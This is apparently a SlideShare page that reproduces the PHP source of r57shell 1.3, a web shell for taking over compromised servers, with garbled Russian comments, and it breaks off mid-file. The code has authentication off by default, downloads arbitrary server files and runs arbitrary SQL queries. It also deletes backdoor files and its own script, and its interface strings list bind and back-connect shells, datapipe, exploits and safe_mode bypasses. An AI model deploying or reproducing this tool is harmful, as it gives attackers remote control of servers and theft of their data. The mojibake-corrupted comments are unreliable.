SlideShare une entreprise Scribd logo

Nop2

G
guestea6d59
1  sur  47
<?php / *********************************************************************************** *******************/ /* /* # # # # /* # # # # /* # # # # /* # ## #### ## # /* ## ## ###### ## ## /* ## ## ###### ## ## /* ## ## #### ## ## /* ### ############ ### /* ######################## /* ############## /* ######## ########## ####### /* ### ## ########## ## ### /* ### ## ########## ## ### /* ### # ########## # ### /* ### ## ######## ## ### /* ## # ###### # ## /* ## # #### # ## /* ## ## /* r57shell.php - ñêðèïò Ãà ïõï ïîçâîëÿþùèé âà ì à ¢Ã»Ã¯Ã®Ã«Ãÿòü ñèñòåìÃûå êîìà Ãäû Ãà ñåðâåðå ÷åðåç áà °Ã óçåð /* åû ìîæåòå ñêà ÷à òü Ãîâóþ âåðñèþ Ãà Ãà øåì ñà éòå: http://c99shell.com /* ååðñèÿ: 1.3 (05.03.2006) / *~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~*/ /* ÎòäåëüÃà ÿ áëà ãîäà ðÃîñòü çà ïîìîùü è èäåè: blf, phoenix, virus, NorD è âñåì ÷åðòÿì èç RST/GHC. /* Åñëè ó Ãoà ñ åñòü êà êèå-ëèáî èäåè ïî ïîâîäó òîãî êà êèå åóÃêöèè ñëåäóåò äîáà âèòü â ñêðèïò òî ïèøèòå /* Ãà rst@void.ru. ÃÃñå ïðåäëîæåÃèÿ áóäóò ðà ññìîòðåÃû. / *~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~*/ /* (c)oded by 1dt.w0lf /* RST/GHC http://c99shell.com , http://ghc.ru /* ANY MODIFIED REPUBLISHING IS RESTRICTED / *********************************************************************************** *******************/ /* ~~~ Íà ñòðîéêè | Options ~~~ */ // ÃÃûáîð ÿçûêà | Language // $language='ru' - ðóññêèé (russian) // $language='eng' - english (à Ããëèéñêèé) $language='eng'; // ÀóòåÃòèåèêà öèÿ | Authentification // $auth = 1; - ÀóòåÃòèåèêà öèÿ âêëþ÷åÃà ( authentification = On ) // $auth = 0; - ÀóòåÃòèåèêà öèÿ âûêëþ÷åÃà ( authentification = Off )
$auth = 0; // Ëîãèà è ïà ðîëü äëÿ äîñòóïà ê ñêðèïòó (Login & Password for access) // ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅÐÅÄ ÐÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅ ÐÃÃÅÐÅ!!! (CHANGE THIS!!!) // Ëîãèà è ïà ðîëü øèåðóþòñÿ ñ ïîìîùüþ à ëãîà °Ã¨Ã²Ã¬Ã md5, çÃà ÷åÃèÿ ïî óìîë÷à Ãèþ 'r57' // Login & password crypted with md5, default is 'r57' $name='ec371748dc2da624b35a4f8f685dd122'; // ëîãèà ïîëüçîâà òåëÿ (user login) $pass='ec371748dc2da624b35a4f8f685dd122'; // ïà ðîëü ïîëüçîâà òåëÿ (user password) / *********************************************************************************** *******************/ error_reporting(0); set_magic_quotes_runtime(0); @set_time_limit(0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); $safe_mode = @ini_get('safe_mode'); $version = "1.3"; if(version_compare(phpversion(), '4.1.0') == -1) { $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; } if (@get_magic_quotes_gpc()) { foreach ($_POST as $k=>$v) { $_POST[$k] = stripslashes($v); } foreach ($_SERVER as $k=>$v) { $_SERVER[$k] = stripslashes($v); } } if($auth == 1) { if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) { header('WWW-Authenticate: Basic realm="r57shell"'); header('HTTP/1.0 401 Unauthorized'); exit("<b><a href=http://c99shell.com>r57shell</a> : Access Denied</b>"); } } $head = '<!-- Çäðà âñòâóé Çà ñÿ --> <html> <head> <title>r57shell</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> <STYLE> tr { BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #E8481C 1px solid; BORDER-LEFT: #E8481C 1px solid; BORDER-BOTTOM: #aaaaaa 1px solid; } td { BORDER-RIGHT: #aaaaaa 1px solid; BORDER-TOP: #E8481C 1px solid; BORDER-LEFT: #E8481C 1px solid; BORDER-BOTTOM: #aaaaaa 1px solid; } .table1 { BORDER-RIGHT: #3A6EA5 0px; BORDER-TOP: #3A6EA5 0px; BORDER-LEFT: #3A6EA5 0px; BORDER-BOTTOM: #3A6EA5 0px; BACKGROUND-COLOR: #81D1EE; } .td1 { BORDER-RIGHT: #3A6EA5 0px; BORDER-TOP: #3A6EA5 0px; BORDER-LEFT: #3A6EA5 0px; BORDER-BOTTOM: #3A6EA5 0px; font: 7pt Verdana; } .tr1 { BORDER-RIGHT: #3A6EA5 0px; BORDER-TOP: #3A6EA5 0px; BORDER-LEFT: #3A6EA5 0px; BORDER-BOTTOM: #3A6EA5 0px; } table { BORDER-RIGHT: #E8481C 1px outset; BORDER-TOP: #E8481C 1px outset; BORDER-LEFT: #E8481C 1px outset; BORDER-BOTTOM: #E8481C 1px outset; BACKGROUND-COLOR: #81D1EE; } input { BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #FC602B 1px solid; BORDER-LEFT: #FC602B 1px solid; BORDER-BOTTOM: #000000 1px solid; BACKGROUND-COLOR: #FFFFFF; font: 8pt Verdana; } select { BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #FC602B 1px solid; BORDER-LEFT: #FC602B 1px solid; BORDER-BOTTOM: #000000 1px solid; BACKGROUND-COLOR: #FFFFFF; font: 8pt Verdana; } submit { BORDER-RIGHT: buttonhighlight 2px outset; BORDER-TOP: buttonhighlight 2px outset; BORDER-LEFT: buttonhighlight 2px outset; BORDER-BOTTOM: buttonhighlight 2px outset; BACKGROUND-COLOR: #FFFFFF;
width: 30%; } textarea { BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #FC602B 1px solid; BORDER-LEFT: #FC602B 1px solid; BORDER-BOTTOM: #000000 1px solid; BACKGROUND-COLOR: #FFFFFF; font: Fixedsys bold; } BODY { margin-top: 1px; margin-right: 1px; margin-bottom: 1px; margin-left: 1px; } A:link {COLOR:white; TEXT-DECORATION: none} A:visited { COLOR:white; TEXT-DECORATION: none} A:active {COLOR:white; TEXT-DECORATION: none} A:hover {color:blue;TEXT-DECORATION: none} </STYLE>'; class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "x50x4bx05x06x00x00x00x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = 'x' . $dtime[6] . $dtime[7] . 'x' . $dtime[4] . $dtime[5] . 'x' . $dtime[2] . $dtime[3] . 'x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "x50x4bx03x04"; $fr .= "x14x00"; $fr .= "x00x00"; $fr .= "x08x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $this -> datasec[] = $fr; $cdrec = "x50x4bx01x02"; $cdrec .= "x00x00"; $cdrec .= "x14x00"; $cdrec .= "x00x00"; $cdrec .= "x08x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset += strlen($fr); $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "x00x00"; } } function compress(&$filename,&$filedump,$compress) { global $content_encoding; global $mime_type; if ($compress == 'bzip' && @function_exists('bzcompress')) { $filename .= '.bz2'; $mime_type = 'application/x-bzip2'; $filedump = bzcompress($filedump); } else if ($compress == 'gzip' && @function_exists('gzencode')) { $filename .= '.gz'; $content_encoding = 'x-gzip';
$mime_type = 'application/x-gzip'; $filedump = gzencode($filedump); } else if ($compress == 'zip' && @function_exists('gzcompress')) { $filename .= '.zip'; $mime_type = 'application/zip'; $zipfile = new zipfile(); $zipfile -> addFile($filedump, substr($filename, 0, -4)); $filedump = $zipfile -> file(); } else { $mime_type = 'application/octet-stream'; } } function mailattach($to,$from,$subj,$attach) { $headers = "From: $fromrn"; $headers .= "MIME-Version: 1.0rn"; $headers .= "Content-Type: ".$attach['type']; $headers .= "; name="".$attach['name'].""rn"; $headers .= "Content-Transfer-Encoding: base64rnrn"; $headers .= chunk_split(base64_encode($attach['content']))."rn"; if(@mail($to,$subj,"",$headers)) { return 1; } return 0; } class my_sql { var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect() { switch($this->db) { case 'MySQL': if(empty($this->port)) { $this->port = '3306'; } if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user, $this->pass); if(is_resource($this->connection)) return 1; break; case 'MSSQL': if(empty($this->port)) { $this->port = '1433'; } if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,
$this->pass); if($this->connection) return 1; break; case 'PostgreSQL': if(empty($this->port)) { $this->port = '5432'; } $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; break; case 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; break; } return 0; } function select_db() { switch($this->db) { case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; } return 0; } function query($query) { $this->res=$this->error=''; switch($this->db) { case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this- >connection))) { $this->error = @mysql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection))) { $this->error = 'Query error';
return 0; } else if(@mssql_num_rows($this->res) > 0) { return 1; } return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query))) { $this->error = @pg_last_error($this->connection); return 0; } else if(@pg_num_rows($this->res) > 0) { return 1; } return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query))) { $this->error = 'Query parse error'; } else { if(@ociexecute($this->res)) { if(@ocirowcount($this->res) != 0) return 2; return 1; } $error = @ocierror(); $this->error=$error['message']; } break; } return 0; } function get_result() { $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db) { case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
@pg_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this- >num_rows++; @ocifreestatement($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; } return 0; } function dump($table) { if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '## Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db) { case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table']; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this- >columns).'`) VALUES (''.@implode("', '", $this->rows[$i]).'');'; } break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this- >columns).') VALUES (''.@implode("', '", $this->rows[$i]).'');'; } break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) {
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this- >columns).') VALUES (''.@implode("', '", $this->rows[$i]).'');'; } break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## under construction'; break; default: return 0; break; } return 1; } function close() { switch($this->db) { case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; } } function affected_rows() { switch($this->db) { case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; default: return 0; break; } } } if(isset($_GET['img'])&&!empty($_GET['img'])) { $images = array(); $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw
=='; $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw =='; @ob_clean(); header("Content-type: image/gif"); echo base64_decode($images[$_GET['img']]); die(); } if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) { if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; } else { @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename="".$filename."";"); echo $filedump; exit(); } } if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ] </b></font></div>"; die(); } if ($_POST['cmd']=="db_query") { echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=orange><b>Can't connect to SQL server</b></font></div>"; else { if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=orange><b>Can't select database</b></font></div>"; else { foreach($querys as $num=>$query) { if(strlen($query)>5) { echo "<font face=Verdana size=-2 color=white><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query))
{ case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>". $sql->error."</b></font></td></tr></table>"; break; case '1': if($sql->get_result()) { echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bgcolor=#3A6EA5><font face=Verdana size=-2><b>&nbsp;", $sql->columns); echo "<tr><td bgcolor=#3A6EA5><font face=Verdana size=-2><b>&nbsp;". $keys."&nbsp;</b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++) { foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); echo '<tr><td><font face=Verdana size=-2>&nbsp;'. $values.'&nbsp;</font></td></tr>'; } echo "</table>"; } break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; } } } } } echo "<br><form name=form method=POST>"; echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cmd',0,'db_query'); echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(! empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=" Run SQL query "></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=". $_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } if(isset($_GET['delete'])) { @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); } if(isset($_GET['tmp'])) {
@unlink("/tmp/bdpl"); @unlink("/tmp/back"); @unlink("/tmp/bd"); @unlink("/tmp/bd.c"); @unlink("/tmp/dp"); @unlink("/tmp/dpc"); @unlink("/tmp/dpc.c"); } if(isset($_GET['phpini'])) { echo $head; function U_value($value) { if ($value == '') return '<i>no value</i>'; if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; if ($value === null) return 'NULL'; if (@is_object($value)) $value = (array) $value; if (@is_array($value)) { @ob_start(); print_r($value); $value = @ob_get_contents(); @ob_end_clean(); } return U_wordwrap((string) $value); } function U_wordwrap($str) { $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); } if (@function_exists('ini_get_all')) { $r = ''; echo '<table width=100%>', '<tr><td bgcolor=#3A6EA5><font face=Verdana size=-2 color=orange><div align=center><b>Directive</b></div></font></td><td bgcolor=#3A6EA5><font face=Verdana size=-2 color=orange><div align=center><b>Local Value</b></div></font></td><td bgcolor=#3A6EA5><font face=Verdana size=-2 color=orange><div align=center><b>Master Value</b></div></font></td></tr>'; foreach (@ini_get_all() as $key=>$value) { $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'. $key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></ div></font></td></tr>'; } echo $r; echo '</table>'; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=". $_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } if(isset($_GET['cpu'])) { echo $head; echo '<table width=100%><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2 color=orange><b>CPU</b></font></div></td></tr></table><table
width=100%>'; $cpuf = @file("cpuinfo"); if($cpuf) { $c = @sizeof($cpuf); for($i=0;$i<$c;$i++) { $info = @explode(":",$cpuf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; } echo $r; } else { echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; } echo '</table>'; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=". $_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } if(isset($_GET['mem'])) { echo $head; echo '<table width=100%><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2 color=orange><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; $memf = @file("meminfo"); if($memf) { $c = sizeof($memf); for($i=0;$i<$c;$i++) { $info = explode(":",$memf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; } echo $r; } else { echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; } echo '</table>'; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=". $_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } $lang=array( 'ru_text1' =>'ÃEûïîëÃÃ¥ÃÃà ÿ êîìà Ãäà ', 'ru_text2' =>'ÃEûïîëÃÃ¥Ãèå êîìà Ãä Ãà ñåðâåðå', 'ru_text3' =>'Ã'ûïîëÃèòü êîìà Ãäó',
'ru_text4' =>'Ðà áî÷à ÿ äèðåêòîðèÿ', 'ru_text5' =>'Çà ãðóçêà åà éëîâ Ãà ñåðâåð', 'ru_text6' =>'Ëîêà ëüÃûé åà éë', 'ru_text7' =>'Àëèà ñû', 'ru_text8' =>'Àûáåðèòå à ëèà ñ', 'ru_butt1' =>'ÀûïîëÃèòü', 'ru_butt2' =>'Çà ãðóçèòü', 'ru_text9' =>'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash', 'ru_text10'=>'Îòêðûòü ïîðò', 'ru_text11'=>'Ïà ðîëü äëÿ äîñòóïà ', 'ru_butt3' =>'Îòêðûòü', 'ru_text12'=>'back-connect', 'ru_text13'=>'IP-à äðåñ', 'ru_text14'=>'Ïîðò', 'ru_butt4' =>'ÏûïîëÃèòü', 'ru_text15'=>'Çà ãðóçêà åà éëîâ ñ óäà ëåÃÃîãî ñåðâåðà ', 'ru_text16'=>'Èñïîëüçîâà òü', 'ru_text17'=>'Óäà ëåÃÃûé åà éë', 'ru_text18'=>'Ëîêà ëüÃûé åà éë', 'ru_text19'=>'Exploits', 'ru_text20'=>'Èñïîëüçîâà òü', 'ru_text21'=>'Íîâîå èìÿ', 'ru_text22'=>'datapipe', 'ru_text23'=>'Ëîêà ëüÃûé ïîðò', 'ru_text24'=>'Óäà ëåÃÃûé õîñò', 'ru_text25'=>'Óäà ëåÃÃûé ïîðò', 'ru_text26'=>'Èñïîëüçîâà òü', 'ru_butt5' =>'Çà ïóñòèòü', 'ru_text28'=>'Ðà áîòà â safe_mode', 'ru_text29'=>'Äîñòóï çà ïðåùåÃ', 'ru_butt6' =>'ÑìåÃèòü', 'ru_text30'=>'Ïðîñìîòð åà éëà ', 'ru_butt7' =>'Ïûâåñòè', 'ru_text31'=>'Ôà éë ÃÃ¥ Ãà éäåÃ', 'ru_text32'=>'ÔûïîëÃÃ¥Ãèå PHP êîäà ', 'ru_text33'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ãè÷åÃ- èé open_basedir ÷åðåç åóÃêöèè cURL', 'ru_butt8' =>'Ïðîâåðèòü', 'ru_text34'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ãè÷åÃ- èé safe_mode ÷åðåç åóÃêöèþ include', 'ru_text35'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ãè÷åÃ- èé safe_mode ÷åðåç çà ãðóçêó åà éëà â mysql', 'ru_text36'=>'Áà çà . Òà áëèöà ', 'ru_text37'=>'ËîãèÃ', 'ru_text38'=>'Ïà ðîëü', 'ru_text39'=>'Áà çà ', 'ru_text40'=>'Äà ìï òà áëèöû áà çû äà ÃÃûõ', 'ru_butt9' =>'Äà ìï', 'ru_text41'=>'Ñîõðà Ãèòü â åà éëå', 'ru_text42'=>'Ðåäà êòèðîâà Ãèå åà éëà ', 'ru_text43'=>'Ðåäà êòèðîâà òü åà éë', 'ru_butt10'=>'Ñîõðà Ãèòü', 'ru_butt11'=>'Ðåäà êòèðîâà òü', 'ru_text44'=>'Ðåäà êòèðîâà Ãèå åà éëà ÃåâîçìîæÃî! Äîñòóï òîëüêî äëÿ ÷òåÃèÿ!', 'ru_text45'=>'Ôà éë ñîõðà ÃÃ¥Ã', 'ru_text46'=>'Ïðîñìîòð phpinfo()', 'ru_text47'=>'Ïðîñìîòð Ãà ñòðîåê php.ini', 'ru_text48'=>'Óäà ëåÃèå âðåìåÃÃûõ åà éëîâ',
'ru_text49'=>'Óäà ëåÃèå ñêðèïòà ñ ñåðâåðà ', 'ru_text50'=>'ÈÃåîðìà öèÿ î ïðîöåññîðå', 'ru_text51'=>'ÈÃåîðìà öèÿ î ïà ìÿòè', 'ru_text52'=>'Òåêñò äëÿ ïîèñêà ', 'ru_text53'=>'Èñêà òü â ïà ïêå', 'ru_text54'=>'Ïîèñê òåêñòà â åà éëà õ', 'ru_butt12'=>'Íà éòè', 'ru_text55'=>'Òîëüêî â åà éëà õ', 'ru_text56'=>'Íè÷åãî ÃÃ¥ Ãà éäåÃî', 'ru_text57'=>'Ñîçäà òü/Óäà ëèòü Ôà éë/Äèðåêòîðèþ', 'ru_text58'=>'Èìÿ', 'ru_text59'=>'Ôà éë', 'ru_text60'=>'Äèðåêòîðèþ', 'ru_butt13'=>'Ñîçäà òü/Óäà ëèòü', 'ru_text61'=>'Ôà éë ñîçäà Ã', 'ru_text62'=>'Äèðåêòîðèÿ ñîçäà Ãà ', 'ru_text63'=>'Ôà éë óäà ëåÃ', 'ru_text64'=>'Äèðåêòîðèÿ óäà ëåÃà ', 'ru_text65'=>'Ñîçäà òü', 'ru_text66'=>'Óäà ëèòü', 'ru_text67'=>'Chown/Chgrp/Chmod', 'ru_text68'=>'Êîìà Ãäà ', 'ru_text69'=>'Ïà ðà ìåòð1', 'ru_text70'=>'Ïà ðà ìåòð2', 'ru_text71'=>"Ïòîðîé ïà ðà ìåòð êîìà Ãäû:rn- äëÿ CHOWN - èìÿ Ãîâîãî ïîëüçîâà òåëÿ èëè åãî UID (÷èñëîì) rn- äëÿ êîìà Ãäû CHGRP - èìÿ ãðóïïû èëè GID (÷èñëîì) rn- äëÿ êîìà Ãäû CHMOD - öåëîå ÷èñëî â âîñüìåðè÷Ãîì ïà °Ã¥Ã¤Ã±Ã²Ã âëåÃèè (Ãà ïðèìåð 0777)", 'ru_text72'=>'Òåêñò äëÿ ïîèñêà ', 'ru_text73'=>'Èñêà òü â ïà ïêå', 'ru_text74'=>'Èñêà òü â åà éëà õ', 'ru_text75'=>'* ìîæÃî èñïîëüçîâà òü ðåãóëÿðÃîå âûà °Ã æåÃèå', 'ru_text76'=>'Ïîèñê òåêñòà â åà éëà õ ñ ïîìîùüþ óòèëèòû find', 'ru_text80'=>'Òèï', 'ru_text81'=>'Ñåòü', 'ru_text82'=>'Áà çû äà ÃÃûõ', 'ru_text83'=>'ÁûïîëÃÃ¥Ãèå SQL çà ïðîñà ', 'ru_text84'=>'SQL çà ïðîñ', 'ru_text85'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ãè÷åÃ- èé safe_mode ÷åðåç âûïîëÃÃ¥Ãèå êîìà Ãä â MSSQL ñåðâåðå', 'ru_text86'=>'Ñêà ÷èâà Ãèå åà éëà ñ ñåðâåðà ', 'ru_butt14'=>'Ñêà ÷à òü', 'ru_text87'=>'Ñêà ÷èâà 